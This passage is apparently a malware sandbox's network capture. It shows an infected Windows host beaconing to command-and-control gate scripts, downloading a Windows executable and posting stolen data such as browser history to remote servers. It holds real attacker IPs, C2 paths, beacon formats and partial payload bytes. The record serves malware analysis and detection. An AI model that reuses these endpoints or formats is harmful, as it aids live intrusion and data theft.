Dec 12, 2024 16:49:47.060163975 CET	1236	IN	Data Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32 Data Ascii: (v{#{#owox(+oy{,{ oo+{!oo(2z,{",{"o/(z((X[((X[((X[(q~(-(-(*~to(3to^(
Dec 12, 2024 16:49:47.060178041 CET	1236	IN	Data Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03 Data Ascii: {R2{coR}U{coo{Q"}Q2{cow~{coy}]so2{cosN{cop(2{dosN{dop({VR}Vs({WR}Ws(F{cot
Dec 12, 2024 16:49:47.060255051 CET	1236	IN	Data Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00 Data Ascii: }q{r"}r(0{s"}s{t"}t{u"}uN((((z,{v,{vo/((5"}xN{o9o<&{\|f}\|{{\|o2{o?*{o9(
Dec 12, 2024 16:49:47.060266018 CET	896	IN	Data Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01 Data Ascii: ]s((rp}rp}rp}rp}(({{{"}{"}{(dt%r2poeoftogz,{,{o/(*rp}rp}sm}
Dec 12, 2024 16:49:47.060283899 CET	1236	IN	Data Raw: 00 04 6f 9a 00 00 0a 1b 58 28 01 01 00 0a 02 28 b0 01 00 06 2a b2 02 28 ca 01 00 06 2c 12 02 7b cc 00 00 04 02 7b c2 00 00 04 6f 6f 00 00 0a 2a 02 7b cc 00 00 04 02 28 a9 01 00 06 6f 6f 00 00 0a 2a 1e 02 7b c4 00 00 04 2a 1e 02 7b c5 00 00 04 2a Data Ascii: oX(((,{{oo{(oo{{J{oooJ{oxo{o((,{orp6{o2{o\|6{o}v{o~}{o~*6{o
Dec 12, 2024 16:49:47.060318947 CET	1236	IN	Data Raw: 00 00 04 6f 77 00 00 0a 2a ba 02 7b f9 00 00 04 03 6f 79 00 00 0a 02 7b f9 00 00 04 02 7b f9 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a 32 02 7b fa 00 00 04 6f bd 00 00 0a 2a 36 02 7b fa 00 00 04 03 6f c1 00 00 0a Data Ascii: ow{oy{{owox(+oy2{o6{oJ{oooz,{,{o/(zB#su(vB{(L{:}(M{*}o,o(N(+}(M
Dec 12, 2024 16:49:47.060461998 CET	1236	IN	Data Raw: 02 7b 23 01 00 04 03 6f 6f 00 00 0a 02 7b 24 01 00 04 02 7b 23 01 00 04 6f f2 00 00 0a 6f 6f 00 00 0a 2a 32 02 7b 23 01 00 04 6f f2 00 00 0a 2a aa 02 03 7d 1f 01 00 04 02 7b 22 01 00 04 02 7b 1f 01 00 04 28 29 00 00 06 02 7b 23 01 00 04 02 7b 1f Data Ascii: {#oo{${#ooo2{#o}{"{(){#{(){6{"oo2{"oz,{!,{!o/(znd}%(r((2{&f}({+{((){(*f}){,{
Dec 12, 2024 16:49:47.060473919 CET	1236	IN	Data Raw: 03 00 06 2a 1e 02 7b 54 01 00 04 2a 96 02 03 7d 54 01 00 04 02 7b 56 01 00 04 02 7b 54 01 00 04 28 29 00 00 06 02 02 7b 54 01 00 04 28 29 00 00 06 2a f6 02 7b 56 01 00 04 02 28 99 00 00 0a 02 7b 52 01 00 04 5a 02 7b 53 01 00 04 5b 6f d6 00 00 0a Data Ascii: {T}T{V{T(){T(){V({RZ{S[o{V{T(){T()2{Vo6{Voo{R{Sz,{U,{Uo/(zR}Y((?n}Y(o(?*"}W
Dec 12, 2024 16:49:47.060486078 CET	896	IN	Data Raw: 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 02 6f a8 03 00 06 2a d6 02 73 fa 01 00 0a 7d 94 01 00 04 02 73 fa 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 03 02 6f 19 01 00 0a 02 6f a8 Data Ascii: }s}(os}s}s}(ooss}{o{rpo{o{os}{o(j,3os*os{"}F(
Dec 12, 2024 16:49:47.180282116 CET	1236	IN	Data Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00 Data Ascii: }{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.10	50120	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:45.641004086 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:45.761524916 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:47.245667934 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.10	50124	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:47.472443104 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:47.592431068 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:48.933355093 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.10	50125	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:48.268847942 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:49:49.598033905 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.10	50126	80.82.65.70	80	5584	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:48.502044916 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:50.078233957 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:49 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-
Dec 12, 2024 16:49:50.078246117 CET	1236	IN	Data Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04 Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
Dec 12, 2024 16:49:50.078253031 CET	1236	IN	Data Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70 Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
Dec 12, 2024 16:49:50.078277111 CET	672	IN	Data Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04 Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
Dec 12, 2024 16:49:50.078282118 CET	1236	IN	Data Raw: 0a 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 0a 00 00 04 72 35 02 00 70 22 00 00 04 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 0a 00 00 04 28 3c 00 00 0a 6f 51 00 00 0a 02 7b 0a 00 00 04 06 72 eb 03 00 70 6f 52 00 00 0a 74 50 00 00 01 6f Data Ascii: (MoN{r5p"AsOoP{(<oQ{rpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o[{#V@o\{o]{^s>o?{
Dec 12, 2024 16:49:50.078288078 CET	1236	IN	Data Raw: 6f 74 00 00 0a 02 7b 12 00 00 04 20 5e 01 00 00 1f 1d 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 12 00 00 04 1c 1e 1c 1e 73 40 00 00 0a 6f 41 00 00 0a 02 7b 12 00 00 04 1f 64 6f 75 00 00 0a 02 7b 12 00 00 04 72 47 05 00 70 6f 42 00 00 0a 02 7b 12 00 00 Data Ascii: ot{ ^s>o?{s@oA{dou{rGpoB{(vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{s>o?{s@oA{rmpoB{
Dec 12, 2024 16:49:50.078298092 CET	1236	IN	Data Raw: 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 19 00 00 04 72 67 06 00 70 6f 42 00 00 0a 02 7b 19 00 00 04 20 de 03 00 00 20 ba 02 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 19 00 00 04 1f 11 6f 45 00 00 0a 02 7b 15 00 00 04 17 6f 7c 00 00 0a Data Ascii: s@oA{rgpoB{ sCoD{oE{o\|{o}{(~o{(ao{(~o{(o9{rupoRtPo{rpo{(KoL{r5p"\|AsOo
Dec 12, 2024 16:49:50.078304052 CET	1236	IN	Data Raw: 04 02 73 2e 00 00 0a 7d 25 00 00 04 02 73 2e 00 00 0a 7d 26 00 00 04 02 73 2d 00 00 0a 7d 28 00 00 04 02 73 95 00 00 0a 7d 2b 00 00 04 02 73 96 00 00 0a 7d 2a 00 00 04 02 73 97 00 00 0a 7d 29 00 00 04 02 73 30 00 00 0a 7d 2c 00 00 04 02 7b 1d 00 Data Ascii: s.}%s.}&s-}(s}+s}*s})s0},{o4{o5{"o4{(o4{,o5(4{o6{o7{(jo9{o:{o;{o:{o;{o:{ o;
Dec 12, 2024 16:49:50.078608036 CET	1236	IN	Data Raw: 7b 27 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 27 00 00 04 19 6f 48 00 00 0a 02 7b 27 00 00 04 16 6f 49 00 00 0a 02 7b 27 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 27 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 27 00 00 04 28 4d 00 00 0a Data Ascii: {'(<o9{'oH{'oI{'rpoJ{'(KoL{'(MoN{'r5p"AsOoP{'(<oQ{'rKpoRtPoS{'oT{'oU{'oV{'oW{'oX{'oY{'#
Dec 12, 2024 16:49:50.078620911 CET	1236	IN	Data Raw: 45 00 00 0a 02 7b 24 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 25 00 00 04 28 38 00 00 0a 6f 47 00 00 0a 02 7b 25 00 00 04 28 5f 00 00 0a 6f 39 00 00 0a 02 7b 25 00 00 04 19 6f 48 00 00 0a 02 7b 25 00 00 04 16 6f 49 00 00 0a 02 7b 25 00 00 04 Data Ascii: E{$r9po!{%(8oG{%(_o9{%oH{%oI{%rqpoJ{%(KoL{%(MoN{%r5p"AsOoP{%(<oQ{%rypoRtPoS{%oT{%oU{%oV{%oW
Dec 12, 2024 16:49:50.198463917 CET	1236	IN	Data Raw: 7b 28 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 28 00 00 04 72 67 06 00 70 6f 42 00 00 0a 02 7b 28 00 00 04 20 92 03 00 00 20 6a 02 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 28 00 00 04 1e 6f 45 00 00 0a 02 7b 2b 00 00 04 20 8f 01 Data Ascii: {(s@oA{(rgpoB{( jsCoD{(oE{+ \|s>o?{+s@oA{+ropoB{+p#sCoD{+oE{+rpo!{+o{+,sgoh{* *s>o?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.10	50127	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:49.159625053 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:49.279393911 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:50.885240078 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.10	50128	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:51.109973907 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:51.229820967 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:52.725106001 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.10	50130	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:51.350697994 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:49:52.715373039 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.10	50131	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:52.953471899 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:53.073352098 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:54.663831949 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.10	50133	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:54.577158928 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:49:55.898929119 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.10	50134	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:54.890091896 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:55.009968996 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:56.352857113 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.10	50136	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:56.578699112 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:56.698621988 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:58.227936029 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.10	50138	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:57.571371078 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:49:58.941513062 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.10	50139	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:58.459934950 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:58.579931021 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:59.922442913 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.10	50140	185.215.113.206	80	7020	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:59.769385099 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:59.769413948 CET	1067	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb
Dec 12, 2024 16:50:01.595212936 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
